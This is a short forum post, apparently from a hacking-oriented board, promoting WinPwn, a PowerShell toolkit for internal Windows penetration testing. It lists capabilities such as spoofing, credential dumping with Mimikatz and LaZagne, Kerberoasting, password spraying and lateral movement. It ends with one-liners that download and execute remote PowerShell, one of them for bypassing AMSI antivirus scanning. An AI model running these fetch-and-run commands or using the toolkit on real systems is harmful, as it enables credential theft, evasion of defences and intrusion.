- Joined
- Jan 8, 2019
- Messages
- 56,623
- Solutions
- 2
- Reputation
- 32
- Reaction score
- 100,455
- Points
- 2,313
- Credits
- 32,750
6 Years of Service
76%
Automation for internal Windows Penetration Testing.
1) Automatic Proxy Detection
2) Elevated or unelevated Detection
3) Forensic Mode oder Pentest Mode
a. Forensik -> Loki + PSRECON + Todo: Threathunting functions
b. Pentest -> Internal Windows Domain System
i. Inveigh NBNS/SMB/HTTPS Spoofing
ii. Local Reconing -> Hostenum, SessionGopher, FileSearch, PSRecon
iii. Domain Reconing -> GetExploitableSystems, Powerview functions, ACL-Analysis, ADRecon
1) Todo: Grouper for Group Policy overview
iv. Privilege Escalation -> Powersploit (Allchecks), GPP-Passwords, MS-Exploit Search (Sherlock), WCMDump, JAWS
v. Lazagne Password recovery
vi. Exploitation -> Kerberoasting, Mimikittenz, Mimikatz with Admin-rights
vii. LateralMovement -> FindLocalAdminAccess
1) Invoke-MassMimikatz || Powershell Empire Remote Launcher Execution over WMI
2) DomainPasswordspray
viii. Share Enumeration
ix. FindGPOLocation –> Search for user/group rights
x. Find-Fruit
Changelog v1.1
This version contains mainly new features. The execution of various C# binaries in memory, GPO audit functions, various new local recon checks, and domain checks.
Just Import the Modules with: Import-Module .\WinPwn.ps1 or iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn.ps1’)
For AMSI Bypass use the following oneliner: iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/ObfusWinPwn.ps1’)